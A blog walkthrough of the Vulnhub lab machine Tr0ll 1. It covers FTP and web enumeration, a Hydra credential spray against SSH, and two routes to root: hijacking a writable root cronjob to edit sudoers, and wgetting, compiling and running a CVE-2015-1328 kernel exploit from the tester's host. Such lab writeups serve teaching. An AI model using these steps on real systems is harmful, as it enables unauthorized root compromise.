Tr0ll 1 Writeup (Vulnhub Beginner Machine)

-

Tr0ll was inspired by the constant trolling of the machines within the OSCP labs. The goal is simple, gain root and get Proof.txt from the /root directory. Not for the easily frustrated! Fair warning, there be trolls ahead!


Overview

Tr0ll 1 is a beginner Linux machine from Vulnhub. This box plays with several basic cybersecurity concepts, which makes it perfect for OSCP prep. Warning: you might get a bit frustrated :D!

We start by enumerating FTP service and analyzing network traffic PCAP file, which leads into a dead end. Next, we enumerate Apache web server, crawling through different directories while getting constantly trolled along the way. Eventually, we find a valid pair of credentials for SSH.

Once inside, we discover 2 paths to Root. Either we abuse writable cronjob, which we modify in a way it gives us full privileges, or we exploit outdated Linux kernel version, getting Root shell.


Nmap scan

Starting with Nmap scan.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -Pn -A 192.168.1.55 -T5   
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-17 09:19 EDT
Nmap scan report for 192.168.1.55
Host is up (0.00039s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 1000     0            8068 Aug 10  2014 lol.pcap [NSE: writeable]
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.1.84
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 600
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
|   2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|   256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
|_  256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt: 1 disallowed entry 
|_/secret
|_http-server-header: Apache/2.4.7 (Ubuntu)
MAC Address: 00:0C:29:25:9C:72 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.14, Linux 3.8 - 3.16
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.39 ms 192.168.1.55

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.10 seconds

The Nmap scan showed 3 open ports. Port 21 for FTP, port 22 for SSH and port 80 for Apache HTTP server. Let’s enumerate all of these running services one by one.


FTP enumeration & inspecting FTP network traffic

As we can see in the Nmap output, FTP (File Transfer Protocol) is configured to allow an anonymous login. This means that anyone can login with guest account and access some files on the server.

I logged in as user “anonymous” and got access to the “lol.pcap” file. I quickly downloaded it.

┌──(kali㉿kali)-[~]
└─$ ftp 192.168.1.55 
Connected to 192.168.1.55.
220 (vsFTPd 3.0.2)
Name (192.168.1.55:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||24822|).
150 Here comes the directory listing.
-rwxrwxrwx    1 1000     0            8068 Aug 10  2014 lol.pcap
226 Directory send OK.
ftp> get lol.pcap
local: lol.pcap remote: lol.pcap
229 Entering Extended Passive Mode (|||15347|).
150 Opening BINARY mode data connection for lol.pcap (8068 bytes).
100% |******************************************************************************************************************************************************************************************************************|  8068       19.62 MiB/s    00:00 ETA226 Transfer complete.
8068 bytes received in 00:00 (10.88 MiB/s)

The file we got here is a PCAP (packet capture) file.

PCAP files (short for Packet Capture) are files used to store network traffic data captured over a network. They contain raw network packets, including headers and payloads, which can be analyzed for various purposes such as troubleshooting, performance monitoring, or security investigations. (ChatGPT)


I opened it in Wireshark, the network protocol analyzer.

The file stored captured communication between the FTP server and a client. Since FTP is well known for it’s unencrypted network traffic, we can actually see all the sent requests and received responses, including all entered commands, credentials and downloaded files.

exposed communication between the FTP server and the client

In between the traffic, there was a packet with the content of transferred file “secret_stuff.txt”.

message extracted from network packet

It just contained a simple taunting message, resulting in a dead end. Well, this box is titled “Tr0ll” after all, so we have to expect these kind of stuff. Not much we can do here.


Web enumeration

I visited the Apache HTTP server and was greeted with another taunting message.

I looked at the source code and network traffic, but found nothing interesting. Then, I ran Gobuster to perform directory fuzzing. Gobuster gave me couple interesting results back.

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u "http://192.168.1.55" -w /usr/share/wordlists/dirb/common.txt -t 64 -r       
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.55
[+] Method:                  GET
[+] Threads:                 64
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Follow Redirect:         true
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 288]
/.htpasswd            (Status: 403) [Size: 288]
/.hta                 (Status: 403) [Size: 283]
/index.html           (Status: 200) [Size: 36]
/robots.txt           (Status: 200) [Size: 31]
/server-status        (Status: 403) [Size: 292]
/secret               (Status: 200) [Size: 37]
Progress: 4614 / 4615 (99.98%)

I found 1 entry “/secret” in “robots.txt” file.

When I visited the “/secret” page, I saw another trolling image.


Getting trolled constantly & gaining access via SSH

This seemed like dead end as well. So I looked back at everything I found so far, trying to figure out what I missed. I went back to the “secret_stuff” message and tried to access “sup3rs3cr3tdirlol” page on the web server, and it worked. To my surprise, I got redirected to a directory listing.

There was a “roflmao” file, which I quickly downloaded for closer inspection. It was a 32-bit ELF binary. When I ran it, a message got printed, suggesting that I should find address “0x0856BF”.

┌──(kali㉿kali)-[~]
└─$ chmod +x roflmao
                                                                                                                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~]
└─$ ls -la roflmao
-rwxrwxr-x 1 kali kali 7296 May 17 12:25 roflmao
                                                                                                                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~]
└─$ file roflmao 
roflmao: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=5e14420eaa59e599c2f508490483d959f3d2cf4f, not stripped
                                                                                                                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~]
└─$ ./roflmao 
Find address 0x0856BF to proceed

IMPORTANT: Always check unknown binaries from the internet before running them! I decompiled the binary with Ghidra, too. It’s good practice to know the script upside-down before running it ;).

I booted GDB and tried to debug the binary, while trying to access this mysterious address. It turned out that I couldn’t access it after all (PIE is disabled and 0x8048000 is the base address).


Once again, I fell down the rabbit hole. After some time, I realized that I should look for another approach. Like the first time, I took the address and tried to access the “/0x0856BF” page on the web server. Just like earlier, I got redirected to a directory listing with couple directories.

There was the “Pass.txt” file, which contained a password (seemingly).

File “Pass.txt” containing potential password

Another file “which_one_lol.txt” contained a list of usernames (seemingly).

File “which_one_lol.txt” containing potential usernames

I saved all the potential users and password and ran Hydra (online login cracker) to test all possible combinations against SSH. Unfortunately, Hydra didn’t find any matching pair.

Since it’s obvious by now that this box trolls us whenever possible, we have to take a different, more abstract approach. I spent some valuable time here. Tried to switch the wordlists, testing against FTP etc. Once again, I had that feeling that I was missing something.

After a while, I went back to the “/0x0856BF” directory listing and added the names of the files and directories to my password wordlist as well. And that was the part I was missing, as Hydra found a matching pair of user “overflow” with password “Pass.txt”, which is a filename.

I logged into the machine via SSH. Now we have to compromise the Root user.


Privilege escalation by overwriting cronjob (1st approach, probably intended way)

During my walkthrough, I found 2 ways to compromise the Root user from this spot. In this writeup, I’ll show you both the intended and unintended way that showed up over time.


I transferred my trusty Linpeas onto the machine, just so I don’t have to do all the post-exploitation enumeration manually. Linpeas gave me a lot of output, so let’s check what’s interesting here.

We can spot a strange “/var/log/cronlog” file in between the list of writable files.

strange writable file “cronlog” found by Linpeas

I checked out the file and looked at it’s content. It was a cronjob file, running so-called “cleaner.py” script every 2 minutes as user “root”.

overflow@troll:/$ ls -la /var/log/cronlog
-rwxrwxrwx 1 root root 23 Aug 13  2014 /var/log/cronlog
overflow@troll:/$ cat /var/log/cronlog
*/2 * * * * cleaner.py

I found this “cleaner.py” file and looked at it’s content. I also noticed that I have write access to it and that it’s also owned by “root”.

overflow@troll:/var/log$ find / -name cleaner.py 2>/dev/null
/lib/log/cleaner.py
overflow@troll:/var/log$ ls -la /lib/log/cleaner.py
-rwxrwxrwx 1 root root 96 Aug 13  2014 /lib/log/cleaner.py
overflow@troll:/var/log$ cat /lib/log/cleaner.py
#!/usr/bin/env python
import os
import sys
try:
        os.system('rm -r /tmp/* ')
except:
        sys.exit()


Plan was simple: overwrite the Python cronjob with a command that grants our user “overflow” unrestricted privileges on the machine. This is made possible by modifying the “/etc/sudoers” file.

modified “cleaner.py” script, overwriting “/etc/sudoers” file

With that command, I pretty much gave myself Root privileges on the machine. Now, I am able to do whatever I want with my user “overflow”.

overflow@troll:/$ sudo -l
sudo: unable to resolve host troll
[sudo] password for overflow: 
Matching Defaults entries for overflow on troll:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User overflow may run the following commands on troll:
    (ALL : ALL) ALL
overflow@troll:/$ sudo su
sudo: unable to resolve host troll
root@troll:/# id
uid=0(root) gid=0(root) groups=0(root)
root@troll:/# cd /root
root@troll:~# ls -la
total 28
drwx------  3 root root 4096 Aug 13  2014 .
drwxr-xr-x 21 root root 4096 Aug  9  2014 ..
-rw-------  1 root root    0 Aug 13  2014 .bash_history
-rw-r--r--  1 root root   58 Aug 10  2014 proof.txt
-rw-r--r--  1 root root   74 Aug 10  2014 .selected_editor
drwx------  2 root root 4096 Aug 10  2014 .ssh
-rw-------  1 root root 5538 Aug 13  2014 .viminfo
root@troll:~# cat proof.txt 
Good job, you did it! 


702a8c18d29c6f3ca0d99ef5712bfbdc

I switched to the Root user with “sudo su” command and got access to the “/root” directory. The root flag, or “proof.txt” file, was patiently waiting there on us.


Privilege escalation by kernel exploitation (2nd approach, probably unintended way)

This second approach was discovered over some time. If we run Linpeas one more time, we can see that it highlights the Linux kernel version as PE vector. That’s because this Linux kernel version is vulnerable to certain exploits. This box is from 2014 after all, so around 11 years old.

Linpeas highlighted Linux kernel version as PE vector

If you research this “3.13.0–32-generic” version, you’ll find an exploit for it very quickly. I’ve decided to download this “overlayfs Local Privilege Escalation” exploit from ExploitDB.

CVE-2015–1328 is a local privilege escalation vulnerability in Ubuntu’s implementation of “overlayfs” in the Linux kernel. The vulnerability exploited a flaw in how overlayfs handled file capabilities and inode merging between the upper and lower layers. By cleverly crafting the filesystem layout and using the overlay mount, an attacker could manipulate file permissions or trick the kernel into executing files with elevated privileges. This could allow a non-root (local) user to escalate privileges to root, gaining full control over the system. (ChatGPT)


So I transferred this exploit to the target machine, compiled it with GCC and ran it.

overflow@troll:/tmp$ wget http://192.168.1.84:9000/exploit.c
--2025-05-18 04:56:46--  http://192.168.1.84:9000/exploit.c
Connecting to 192.168.1.84:9000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5119 (5.0K) [text/x-csrc]
Saving to: ‘exploit.c’

100%[======================================>] 5,119       --.-K/s   in 0s      

2025-05-18 04:56:46 (729 MB/s) - ‘exploit.c’ saved [5119/5119]

overflow@troll:/tmp$ gcc -o exploit exploit.c
overflow@troll:/tmp$ ./exploit
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),1002(overflow)
# cd /root
# ls -la
total 32
drwx------  3 root root 4096 Aug 13  2014 .
drwxr-xr-x 21 root root 4096 Aug  9  2014 ..
-rw-------  1 root root   39 May 18 04:48 .bash_history
-rw-r--r--  1 root root   74 Aug 10  2014 .selected_editor
drwx------  2 root root 4096 Aug 10  2014 .ssh
-rw-------  1 root root 5538 Aug 13  2014 .viminfo
-rw-r--r--  1 root root   58 Aug 10  2014 proof.txt
# cat proof.txt
Good job, you did it! 


702a8c18d29c6f3ca0d99ef5712bfbdc

After a second or so, I got the root shell. I could access the “/root” directory, which held the “proof.txt” flag. Choose which approach you like more :D.


Summary & final thoughts

Tr0ll is a beginner machine from Vulnhub. This box is a great playground for beginners, as well as a solid practice for OSCP prep. It trolls you constantly, so don’t forget to turn on your abstract thinking. While completing this challenge, we encountered an FTP server with weird PCAP file, leading us to a special directory on the Apache HTTP server. We found other hint in an ELF file, leading us to user and password wordlists. We found a valid pair of credentials with Hydra and got access to the machine via SSH. After that, we could take 2 different approaches to root the box. We could modify a writable cronjob to give ourselves unrestricted privileges or we could exploit an outdated kernel version. In my opinion, this box serves as a great challenge for your nerves and critical/abstract thinking in terms of cybersecurity skills. You will inevitably encounter some form of exhaustion from this machine, which will force you to think outside the box and find non-standard solutions. Recommending to anyone, who’s up to some non-straightforward (almost abstract) challenge. The difficulty doesn’t lie on the technical side of things, but on the mental side.

Comments

Post a Comment

Popular posts from this blog

Hospital Writeup (HackTheBox Medium Machine)

-
Image
Overview Hospital is a medium Windows machine from HackTheBox. This box makes you go against file upload, kernel exploits, database dumping, command injection and keylogging. We start with bypassing file upload restrictions, while evading functions disabled by PHP config. Once we get the shell on Linux container, we dump the database and discover an exploit for unpatched Linux kernel. The exploit gives us a root shell. Next, we crack the hash and use the password to log into Roundcube Webmail. We then abuse the command injection in EPS files and in GhostScript to get shell as another user with higher privileges. We then notice another session running under our user. We use Metasploit’s Meterpreter to migrate to process which runs on that second session and use Meterpreter’s additional functionality to make a screenshot of the desktop and capture keystrokes from that session. Since the user was logging into Webmail as Administrator, we captured his password in the process.
Read more

Bucket Writeup (HackTheBox Medium Machine)

-
Image
Overview Bucket is a medium Linux machine from HackTheBox. This box introduces you to Cloud hacking (kinda) and lets you play with S3 bucket from AWS, showcasing common misconfigurations. We start with discovering special subdomain, which represents an exposed S3 bucket with files used by the web server. After enumeration with “aws” utility, we find out that we can download and upload files. So we upload PHP reverse shell and get initial foothold. Once in, we dump the exposed DynamoDB database and get the credentials for user “roy”, getting the user flag afterwards. Next, we discover several internal services running. We find the source code in Roy’s project files and discover SSRF vulnerability, which leads to arbitrary file read, allowing us to read any file on the machine, including the root flag.
Read more

Mr Robot Writeup (Vulnhub Intermediate Machine)

-
Image
Based on the show, Mr. Robot. This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find. The VM isn’t too difficult. There isn’t any advanced exploitation or reverse engineering. The level is considered beginner-intermediate. Overview Mr. Robot is a beginner-intermediate Linux machine from Vulnhub. It’s based on the show Mr. Robot and has some cool references to it. We start with enumeration of a Wordpress website. We discover an exposed login page and encoded credentials. Once we get into dashboard, we modify a template and gain remote access. Next, we compromise another user by cracking his hash and getting his password. We discover that Nmap has SUID bit set on the machine, which is very insecure because of Nmap’s functionality. We get 3 flags along the way: 1. on special website page, 2. as user flag and 3. as root flag.
Read more